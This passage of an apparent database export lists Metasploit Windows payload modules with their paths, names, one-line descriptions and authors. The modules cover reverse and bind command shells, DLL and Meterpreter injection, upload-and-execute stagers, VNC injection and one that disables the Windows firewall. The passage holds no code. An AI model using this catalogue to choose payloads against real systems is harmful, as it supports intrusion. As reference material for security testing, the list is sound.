00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_ipv6_tcp.rb","payload","windows/patchupdllinject/bind_ipv6_tcp","payload/windows/patchupdllinject/bind_ipv6_tcp","Windows Inject DLL, Bind TCP Stager (IPv6)",300,"Listen for a connection over IPv6, Inject a custom DLL into the exploited process","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , jt , skape " 2222,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_nonx_tcp.rb","payload","windows/patchupdllinject/bind_nonx_tcp","payload/windows/patchupdllinject/bind_nonx_tcp","Windows Inject DLL, Bind TCP Stager (No NX or Win7)",300,"Listen for a connection (No NX), Inject a custom DLL into the exploited process","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"jt , skape , vlad902 " 2223,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_tcp.rb","payload","windows/patchupdllinject/bind_tcp","payload/windows/patchupdllinject/bind_tcp","Windows Inject DLL, Bind TCP Stager",300,"Listen for a connection, Inject a custom DLL into the exploited process","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , jt , sf , skape " 2224,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_tcp_rc4.rb","payload","windows/patchupdllinject/bind_tcp_rc4","payload/windows/patchupdllinject/bind_tcp_rc4","Windows Inject DLL, Bind TCP Stager (RC4 stage encryption)",300,"Listen for a connection, Inject a custom DLL into the exploited process","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , jt , mihi, sf , skape " 2225,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/findtag_ord.rb","payload","windows/patchupdllinject/find_tag","payload/windows/patchupdllinject/find_tag","Windows Inject DLL, Find Tag Ordinal Stager",300,"Use an established connection, Inject a custom DLL into the exploited process","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"jt , skape " 2226,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb","payload","windows/patchupdllinject/reverse_ipv6_tcp","payload/windows/patchupdllinject/reverse_ipv6_tcp","Windows Inject DLL, Reverse TCP Stager (IPv6)",300,"Connect back to the attacker over IPv6, Inject a custom DLL into the exploited process","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , jt , sf , skape " 2227,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_nonx_tcp.rb","payload","windows/patchupdllinject/reverse_nonx_tcp","payload/windows/patchupdllinject/reverse_nonx_tcp","Windows Inject DLL, Reverse TCP Stager (No NX or Win7)",300,"Connect back to the attacker (No NX), Inject a custom DLL into the exploited process","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"jt , skape , vlad902 " 2228,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_ord_tcp.rb","payload","windows/patchupdllinject/reverse_ord_tcp","payload/windows/patchupdllinject/reverse_ord_tcp","Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)",300,"Connect back to the attacker, Inject a custom DLL into the exploited process","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"jt , skape , spoonm " 2229,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp.rb","payload","windows/patchupdllinject/reverse_tcp","payload/windows/patchupdllinject/reverse_tcp","Windows Inject DLL, Reverse TCP Stager",300,"Connect back to the attacker, Inject a custom DLL into the exploited process","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , jt , sf , skape " 2230,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_allports.rb","payload","windows/patchupdllinject/reverse_tcp_allports","payload/windows/patchupdllinject/reverse_tcp_allports","Windows Inject DLL, Reverse All-Port TCP Stager",300,"Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a custom DLL into the exploited process","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , jt , sf , skape " 2231,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_dns.rb","payload","windows/patchupdllinject/reverse_tcp_dns","payload/windows/patchupdllinject/reverse_tcp_dns","Windows Inject DLL, Reverse TCP Stager (DNS)",300,"Connect back to the attacker, Inject a custom DLL into the exploited process","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , jt , sf , skape " 2232,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_rc4.rb","payload","windows/patchupdllinject/reverse_tcp_rc4","payload/windows/patchupdllinject/reverse_tcp_rc4","Windows Inject DLL, Reverse TCP Stager (RC4 stage encryption)",300,"Connect back to the attacker, Inject a custom DLL into the exploited process","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , jt , mihi, sf , skape " 2233,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb","payload","windows/patchupdllinject/reverse_tcp_rc4_dns","payload/windows/patchupdllinject/reverse_tcp_rc4_dns","Windows Inject DLL, Reverse TCP Stager (RC4 stage encryption DNS)",300,"Connect back to the attacker, Inject a custom DLL into the exploited process","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"RageLtMan, hdm , jt , mihi, sf , skape " 2234,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_ipv6_tcp.rb","payload","windows/patchupmeterpreter/bind_ipv6_tcp","payload/windows/patchupmeterpreter/bind_ipv6_tcp","Windows Meterpreter (skape/jt Injection), Bind TCP Stager (IPv6)",300,"Listen for a connection over IPv6, Inject the meterpreter server DLL (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , jt , skape " 2235,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_nonx_tcp.rb","payload","windows/patchupmeterpreter/bind_nonx_tcp","payload/windows/patchupmeterpreter/bind_nonx_tcp","Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)",300,"Listen for a connection (No NX), Inject the meterpreter server DLL (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"jt , skape , vlad902 " 2236,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_tcp.rb","payload","windows/patchupmeterpreter/bind_tcp","payload/windows/patchupmeterpreter/bind_tcp","Windows Meterpreter (skape/jt Injection), Bind TCP Stager",300,"Listen for a connection, Inject the meterpreter server DLL (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , jt , sf , skape " 2237,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_tcp_rc4.rb","payload","windows/patchupmeterpreter/bind_tcp_rc4","payload/windows/patchupmeterpreter/bind_tcp_rc4","Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 stage encryption)",300,"Listen for a connection, Inject the meterpreter server DLL (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , jt , mihi, sf , skape " 2238,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/findtag_ord.rb","payload","windows/patchupmeterpreter/find_tag","payload/windows/patchupmeterpreter/find_tag","Windows Meterpreter (skape/jt Injection), Find Tag Ordinal Stager",300,"Use an established connection, Inject the meterpreter server DLL (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"jt , skape " 2239,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb","payload","windows/patchupmeterpreter/reverse_ipv6_tcp","payload/windows/patchupmeterpreter/reverse_ipv6_tcp","Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)",300,"Connect back to the attacker over IPv6, Inject the meterpreter server DLL (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , jt , sf , skape " 2240,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_nonx_tcp.rb","payload","windows/patchupmeterpreter/reverse_nonx_tcp","payload/windows/patchupmeterpreter/reverse_nonx_tcp","Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)",300,"Connect back to the attacker (No NX), Inject the meterpreter server DLL (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"jt , skape , vlad902 " 2241,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_ord_tcp.rb","payload","windows/patchupmeterpreter/reverse_ord_tcp","payload/windows/patchupmeterpreter/reverse_ord_tcp","Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)",300,"Connect back to the attacker, Inject the meterpreter server DLL (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"jt , skape , spoonm " 2242,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp.rb","payload","windows/patchupmeterpreter/reverse_tcp","payload/windows/patchupmeterpreter/reverse_tcp","Windows Meterpreter (skape/jt Injection), Reverse TCP Stager",300,"Connect back to the attacker, Inject the meterpreter server DLL (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , jt , sf , skape " 2243,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_allports.rb","payload","windows/patchupmeterpreter/reverse_tcp_allports","payload/windows/patchupmeterpreter/reverse_tcp_allports","Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager",300,"Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject the meterpreter server DLL (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , jt , sf , skape " 2244,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_dns.rb","payload","windows/patchupmeterpreter/reverse_tcp_dns","payload/windows/patchupmeterpreter/reverse_tcp_dns","Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)",300,"Connect back to the attacker, Inject the meterpreter server DLL (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , jt , sf , skape " 2245,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_rc4.rb","payload","windows/patchupmeterpreter/reverse_tcp_rc4","payload/windows/patchupmeterpreter/reverse_tcp_rc4","Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 stage encryption)",300,"Connect back to the attacker, Inject the meterpreter server DLL (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , jt , mihi, sf , skape " 2246,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb","payload","windows/patchupmeterpreter/reverse_tcp_rc4_dns","payload/windows/patchupmeterpreter/reverse_tcp_rc4_dns","Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 stage encryption DNS)",300,"Connect back to the attacker, Inject the meterpreter server DLL (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"RageLtMan, hdm , jt , mihi, sf , skape " 2247,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_ipv6_tcp.rb","payload","windows/shell/bind_ipv6_tcp","payload/windows/shell/bind_ipv6_tcp","Windows Command Shell, Bind TCP Stager (IPv6)",300,"Listen for a connection over IPv6, Spawn a piped command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , sf , skape , spoonm " 2248,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_nonx_tcp.rb","payload","windows/shell/bind_nonx_tcp","payload/windows/shell/bind_nonx_tcp","Windows Command Shell, Bind TCP Stager (No NX or Win7)",300,"Listen for a connection (No NX), Spawn a piped command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"sf , spoonm , vlad902 " 2249,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_tcp.rb","payload","windows/shell/bind_tcp","payload/windows/shell/bind_tcp","Windows Command Shell, Bind TCP Stager",300,"Listen for a connection, Spawn a piped command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , sf , skape , spoonm " 2250,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_tcp_rc4.rb","payload","windows/shell/bind_tcp_rc4","payload/windows/shell/bind_tcp_rc4","Windows Command Shell, Bind TCP Stager (RC4 stage encryption)",300,"Listen for a connection, Spawn a piped command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , mihi, sf , skape , spoonm " 2251,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/findtag_ord.rb","payload","windows/shell/find_tag","payload/windows/shell/find_tag","Windows Command Shell, Find Tag Ordinal Stager",300,"Use an established connection, Spawn a piped command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"sf , skape , spoonm " 2252,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_http.rb","payload","windows/shell/reverse_http","payload/windows/shell/reverse_http","Windows Command Shell, Reverse HTTP Stager",300,"Tunnel communication over HTTP, Spawn a piped command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , sf , spoonm " 2253,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_ipv6_http.rb","payload","windows/shell/reverse_ipv6_http","payload/windows/shell/reverse_ipv6_http","Windows Command Shell, Reverse HTTP Stager (IPv6)",300,"Tunnel communication over HTTP and IPv6, Spawn a piped command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , sf , spoonm " 2254,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb","payload","windows/shell/reverse_ipv6_tcp","payload/windows/shell/reverse_ipv6_tcp","Windows Command Shell, Reverse TCP Stager (IPv6)",300,"Connect back to the attacker over IPv6, Spawn a piped command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , sf , skape , spoonm " 2255,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_nonx_tcp.rb","payload","windows/shell/reverse_nonx_tcp","payload/windows/shell/reverse_nonx_tcp","Windows Command Shell, Reverse TCP Stager (No NX or Win7)",300,"Connect back to the attacker (No NX), Spawn a piped command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"sf , spoonm , vlad902 " 2256,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_ord_tcp.rb","payload","windows/shell/reverse_ord_tcp","payload/windows/shell/reverse_ord_tcp","Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)",300,"Connect back to the attacker, Spawn a piped command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"sf , spoonm " 2257,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp.rb","payload","windows/shell/reverse_tcp","payload/windows/shell/reverse_tcp","Windows Command Shell, Reverse TCP Stager",300,"Connect back to the attacker, Spawn a piped command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , sf , skape , spoonm " 2258,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_allports.rb","payload","windows/shell/reverse_tcp_allports","payload/windows/shell/reverse_tcp_allports","Windows Command Shell, Reverse All-Port TCP Stager",300,"Try to connect back to the attacker, on all possible ports (1-65535, slowly), Spawn a piped command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , sf , skape , spoonm " 2259,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_dns.rb","payload","windows/shell/reverse_tcp_dns","payload/windows/shell/reverse_tcp_dns","Windows Command Shell, Reverse TCP Stager (DNS)",300,"Connect back to the attacker, Spawn a piped command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , sf , skape , spoonm " 2260,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_rc4.rb","payload","windows/shell/reverse_tcp_rc4","payload/windows/shell/reverse_tcp_rc4","Windows Command Shell, Reverse TCP Stager (RC4 stage encryption)",300,"Connect back to the attacker, Spawn a piped command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , mihi, sf , skape , spoonm " 2261,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb","payload","windows/shell/reverse_tcp_rc4_dns","payload/windows/shell/reverse_tcp_rc4_dns","Windows Command Shell, Reverse TCP Stager (RC4 stage encryption DNS)",300,"Connect back to the attacker, Spawn a piped command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"RageLtMan, hdm , mihi, sf , skape , spoonm " 2262,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/windows/shell_bind_tcp.rb","payload","windows/shell_bind_tcp","payload/windows/shell_bind_tcp","Windows Command Shell, Bind TCP Inline",300,"Listen for a connection and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"sf , vlad902 " 2263,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb","payload","windows/shell_bind_tcp_xpfw","payload/windows/shell_bind_tcp_xpfw","Windows Disable Windows ICF, Command Shell, Bind TCP Inline",300,"Disable the Windows ICF, then listen for a connection and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"Lin0xx " 2264,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/windows/shell_reverse_tcp.rb","payload","windows/shell_reverse_tcp","payload/windows/shell_reverse_tcp","Windows Command Shell, Reverse TCP Inline",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"sf , vlad902 " 2265,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/windows/speak_pwned.rb","payload","windows/speak_pwned","payload/windows/speak_pwned","Windows Speech API - Say ""You Got Pwned!""",300,"Causes the target to say ""You Got Pwned"" via the Windows Speech API","BSD License","f",,,,,"t",,"Berend-Jan ""SkyLined"" Wever " 2266,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_ipv6_tcp.rb","payload","windows/upexec/bind_ipv6_tcp","payload/windows/upexec/bind_ipv6_tcp","Windows Upload/Execute, Bind TCP Stager (IPv6)",300,"Listen for a connection over IPv6, Uploads an executable and runs it (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , sf , skape , vlad902 " 2267,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_nonx_tcp.rb","payload","windows/upexec/bind_nonx_tcp","payload/windows/upexec/bind_nonx_tcp","Windows Upload/Execute, Bind TCP Stager (No NX or Win7)",300,"Listen for a connection (No NX), Uploads an executable and runs it (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"sf , vlad902 " 2268,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_tcp.rb","payload","windows/upexec/bind_tcp","payload/windows/upexec/bind_tcp","Windows Upload/Execute, Bind TCP Stager",300,"Listen for a connection, Uploads an executable and runs it (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , sf , skape , vlad902 " 2269,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_tcp_rc4.rb","payload","windows/upexec/bind_tcp_rc4","payload/windows/upexec/bind_tcp_rc4","Windows Upload/Execute, Bind TCP Stager (RC4 stage encryption)",300,"Listen for a connection, Uploads an executable and runs it (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , mihi, sf , skape , vlad902 " 2270,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/findtag_ord.rb","payload","windows/upexec/find_tag","payload/windows/upexec/find_tag","Windows Upload/Execute, Find Tag Ordinal Stager",300,"Use an established connection, Uploads an executable and runs it (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"sf , skape , vlad902 " 2271,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_http.rb","payload","windows/upexec/reverse_http","payload/windows/upexec/reverse_http","Windows Upload/Execute, Reverse HTTP Stager",300,"Tunnel communication over HTTP, Uploads an executable and runs it (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , sf , vlad902 " 2272,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_ipv6_http.rb","payload","windows/upexec/reverse_ipv6_http","payload/windows/upexec/reverse_ipv6_http","Windows Upload/Execute, Reverse HTTP Stager (IPv6)",300,"Tunnel communication over HTTP and IPv6, Uploads an executable and runs it (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , sf , vlad902 " 2273,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb","payload","windows/upexec/reverse_ipv6_tcp","payload/windows/upexec/reverse_ipv6_tcp","Windows Upload/Execute, Reverse TCP Stager (IPv6)",300,"Connect back to the attacker over IPv6, Uploads an executable and runs it (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , sf , skape , vlad902 " 2274,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_nonx_tcp.rb","payload","windows/upexec/reverse_nonx_tcp","payload/windows/upexec/reverse_nonx_tcp","Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)",300,"Connect back to the attacker (No NX), Uploads an executable and runs it (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"sf , vlad902 " 2275,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_ord_tcp.rb","payload","windows/upexec/reverse_ord_tcp","payload/windows/upexec/reverse_ord_tcp","Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)",300,"Connect back to the attacker, Uploads an executable and runs it (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"sf , spoonm , vlad902 " 2276,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp.rb","payload","windows/upexec/reverse_tcp","payload/windows/upexec/reverse_tcp","Windows Upload/Execute, Reverse TCP Stager",300,"Connect back to the attacker, Uploads an executable and runs it (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , sf , skape , vlad902 " 2277,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_allports.rb","payload","windows/upexec/reverse_tcp_allports","payload/windows/upexec/reverse_tcp_allports","Windows Upload/Execute, Reverse All-Port TCP Stager",300,"Try to connect back to the attacker, on all possible ports (1-65535, slowly), Uploads an executable and runs it (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , sf , skape , vlad902 " 2278,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_dns.rb","payload","windows/upexec/reverse_tcp_dns","payload/windows/upexec/reverse_tcp_dns","Windows Upload/Execute, Reverse TCP Stager (DNS)",300,"Connect back to the attacker, Uploads an executable and runs it (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , sf , skape , vlad902 " 2279,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_rc4.rb","payload","windows/upexec/reverse_tcp_rc4","payload/windows/upexec/reverse_tcp_rc4","Windows Upload/Execute, Reverse TCP Stager (RC4 stage encryption)",300,"Connect back to the attacker, Uploads an executable and runs it (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , mihi, sf , skape , vlad902 " 2280,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb","payload","windows/upexec/reverse_tcp_rc4_dns","payload/windows/upexec/reverse_tcp_rc4_dns","Windows Upload/Execute, Reverse TCP Stager (RC4 stage encryption DNS)",300,"Connect back to the attacker, Uploads an executable and runs it (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"RageLtMan, hdm , mihi, sf , skape , vlad902 " 2281,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_ipv6_tcp.rb","payload","windows/vncinject/bind_ipv6_tcp","payload/windows/vncinject/bind_ipv6_tcp","VNC Server (Reflective Injection), Bind TCP Stager (IPv6)",300,"Listen for a connection over IPv6, Inject a VNC Dll via a reflective loader (staged)","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape " 2282,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_nonx_tcp.rb","payload","windows/vncinject/bind_nonx_tcp","payload/windows/vncinject/bind_nonx_tcp","VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)",300,"Listen for a connection (No NX), Inject a VNC Dll via a reflective loader (staged)","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","sf , vlad902 " 2283,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_tcp.rb","payload","windows/vncinject/bind_tcp","payload/windows/vncinject/bind_tcp","VNC Server (Reflective Injection), Bind TCP Stager",300,"Listen for a connection, Inject a VNC Dll via a reflective loader (staged)","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape " 2284,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_tcp_rc4.rb","payload","windows/vncinject/bind_tcp_rc4","payload/windows/vncinject/bind_tcp_rc4","VNC Server (Reflective Injection), Bind TCP Stager (RC4 stage encryption)",300,"Listen for a connection, Inject a VNC Dll via a reflective loader (staged)","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , mihi, sf , skape " 2285,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/findtag_ord.rb","payload","windows/vncinject/find_tag","payload/windows/vncinject/find_tag","VNC Server (Reflective Injection), Find Tag Ordinal Stager",300,"Use an established connection, Inject a VNC Dll via a reflective loader (staged)","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","sf , skape " 2286,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_http.rb","payload","windows/vncinject/reverse_http","payload/windows/vncinject/reverse_http","VNC Server (Reflective Injection), Reverse HTTP Stager",300,"Tunnel communication over HTTP, Inject a VNC Dll via a reflective loader (staged)","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf " 2287,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_ipv6_http.rb","payload","windows/vncinject/reverse_ipv6_http","payload/windows/vncinject/reverse_ipv6_http","VNC Server (Reflective Injection), Reverse HTTP Stager (IPv6)",300,"Tunnel communication over HTTP and IPv6, Inject a VNC Dll via a reflective loader (staged)","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf " 2288,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb","payload","windows/vncinject/reverse_ipv6_tcp","payload/windows/vncinject/reverse_ipv6_tcp","VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)",300,"Connect back to the attacker over IPv6, Inject a VNC Dll via a reflective loader (staged)","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape " 2289,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_nonx_tcp.rb","payload","windows/vncinject/reverse_nonx_tcp","payload/windows/vncinject/reverse_nonx_tcp","VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)",300,"Connect back to the attacker (No NX), Inject a VNC Dll via a reflective loader (staged)","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","sf , vlad902 " 2290,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_ord_tcp.rb","payload","windows/vncinject/reverse_ord_tcp","payload/windows/vncinject/reverse_ord_tcp","VNC Server (Reflective 